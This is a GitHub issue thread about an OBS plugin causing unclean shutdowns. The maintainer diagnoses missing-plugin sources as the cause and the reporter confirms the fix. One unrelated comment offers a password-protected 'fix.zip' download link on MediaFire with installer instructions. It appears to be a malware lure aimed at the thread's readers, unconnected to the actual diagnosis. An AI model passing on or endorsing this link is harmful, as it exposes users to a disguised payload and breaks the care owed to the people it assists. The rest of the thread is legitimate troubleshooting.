### ISSUE TITLE
[BUG] - Unclean shutdown

### ISSUE THREAD

**Issue by itroy187** [FiniteSingularity/obs-quick-access-utility#73]
**Describe the bug**
With the plugin v1.0.0 installed, I get a unclean shutdown (no crash though) everytime when quitting OBS. As soon as I remove the plugin, OBS shuts down without errors.

0.0.1-alpha6 does not have this issue

**To Reproduce**
1. Start OBS with plugin installed
2. Exit OBS
3. Start OBS again
4. Log says [Safe Mode] Unclean shutdown detected!

**Expected behavior**
Clean shutdown with the plugin installed

**Environment**
 - OS/Version: Win 10
 - OBS Version: 30.2.3 Portable
 - Quick Access Utility Plugin Version: 1.0.0
 - Dock Type: Multiple. Dynamic and manual

**GPU**
 - GPU make/model: RTX 3090
 - GPU VRAM: 24GB

Log:
[2024-08-28 10-41-28.txt](https://github.com/user-attachments/files/16780827/2024-08-28.10-41-28.txt)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by FiniteSingularity** [comment]
Ok, after digging through your log file, I think I might see what is going on:

It looks like there are three sources that can not be created properly (I suspect because the plugin used for those sources is no longer installed?).  The three sources are:

- `NDI Guest Cam` which is the type `ndi_source`
- `Audio Visualizer VLC Intro` which is the type `spectralizer`
- `Veadotube` which is the type `spout_capture`

While they are not created, OBS still adds an entry for them in the source list.  The search dock/quicksearch grabs all sources in the list, and then later (on shutdown) tries to free them.  I suspect this is what is causing the issue.  Later this morning I will try to replicate this.

**Comment by itroy187** [comment]
You're right. These plugins were no longer installed. I've removed the sources and the issue is gone. THanks a lot! And of course thanks for the awesome plugin!

**Comment by FiniteSingularity** [comment]
Glad to hear that fixed things!  I do need to be able to handle edge-cases like this, and so I'll be working on a fix that doesn't load sources which aren't valid (due to missing plugins or other issues).  I'll leave this issue open to track fixing it.
